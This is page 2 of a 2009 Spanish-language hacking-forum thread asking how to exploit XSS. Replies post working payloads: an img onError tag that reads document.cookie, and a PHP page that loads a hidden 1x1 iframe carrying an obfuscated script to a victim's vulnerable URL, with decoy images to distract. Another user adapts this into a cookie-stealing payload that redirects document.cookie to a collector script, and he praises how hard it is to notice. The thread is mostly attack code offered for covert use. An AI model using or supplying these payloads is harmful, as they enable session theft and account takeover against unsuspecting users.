elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Duda sobre XSS		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Duda sobre XSS  (Leído 5,359 veces)
Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: Duda sobre XSS
« Respuesta #10 en: 3 Marzo 2009, 18:56 pm »
aun que creo recordar que se puede poner algo asi como
Código
  1. <img src="" onError="javascript:alert(document.cookie)" />

No he probado hasta donde se puede llevar ese "onError" pero me funciono en Firefox y en iExplorer :')
En línea
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Duda sobre XSS
« Respuesta #11 en: 3 Marzo 2009, 21:03 pm »
o con onload="alert(document.cookie)" pero si vas a hacer eso ps entonces mejor pones el javascript de plano en el html incrustado pero para que no se vea o por lo menos se disimule que se haga en un iframe y que ese iframe contenga un javascript cifrado talves con "web encript" y que imprima un location hacia el xss, es mas, ni si quiera necesitas hacer eso, basta con php y un <?php header('location: ...'); ?> ya que desde ajáx no compartes sesiones como para compartir las cookies haciendo llamadas remotas. Es mas, ni si quiera necesitas insertar otro archivo en el iframe:

Código
  1. <?php 
  2. $xss = 'x"><sCrIpT s=d>r=document; alert(r.cookie);</ScRiPt><br x="x';
  3. $distraccion[] = 
  4. 'http://www.unaplauso.com/images/anuncios/3/9/7/793_animacion-payaso-pitiklin_2.jpg';
  5. $distraccion[] = 
  6. 'http://www.ctv.es/USERS/hnostar/TECH/V9000/payaso.jpg';
  7. $distraccion[] = 
  8. 'http://mikevsdinos.files.wordpress.com/2008/09/payaso.jpg';
  9. $distraccion[] = 
  10. 'http://www.galeriade.com/Sirona/data/media/3/Payaso_Moderno_-_DSC_2512.jpg';
  11.  
  12. $distraccion = $distraccion[rand(0, (count($distraccion) - 1))];
  13. ?>
  14. <html>
  15. <img border="0" src="<?php echo $distraccion; ?>"/>
  16. <br />
  17. <iframe src="http://www.victima.com/vulnerable.php?variable=<?php
  18.  echo urlencode($xss); 
  19. ?>" width="1" height="1" frameborder="0"></iframe>
  20. </html>
« Última modificación: 3 Marzo 2009, 21:18 pm por WHK » En línea
- https://yhojann.cl/ - https://whk.cl/
pedrox@

Desconectado Desconectado

Mensajes: 48


Ver Perfil
Re: Duda sobre XSS
« Respuesta #12 en: 4 Marzo 2009, 01:08 am »
yeee

me hize un archivo llamado entra.php con lo que comentaste del iframe:

Código
  1. <?php
  2. $xss = urlencode("<script>window.location='http://localhost/xss/xss.php?cookie='+document.cookie;</script>");
  3. ?>
  4.  
  5. <html>
  6. <iframe src="http://localhost/xss/vuln.php?vuln=<?=$xss?>" width="1" height="1" frameborder="0"></iframe>
  7. </html>

Al parecer lo del iframe si es buena idea ya que como no ponga un sniffer y vea los request dudo que se de nadie cuenta. Con <img entonces no se puede hacer verdad?

intente:
<img src="http://localhost/xss/vuln.php?vuln=%3Cscript%3Ewindow.location%3D%27http%3A%2F%2Flocalhost%2Fxss%2Fxss.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E">

pero no me envia nada al archivo donde almaceno las cookies, vamos no va al window.location.
Con la librería gd de php se podría hacer que carge una imagen y a la vez haga una petición a la web enviandonos la cookie, no? o esto solo sirve para CSRF?

Un saludo, gracias por las respuestas.
En línea
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda sobre jueho
Hacking 		JajjSalu2 1 5,015 Último mensaje 4 Febrero 2022, 05:32 am
por Panic0
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines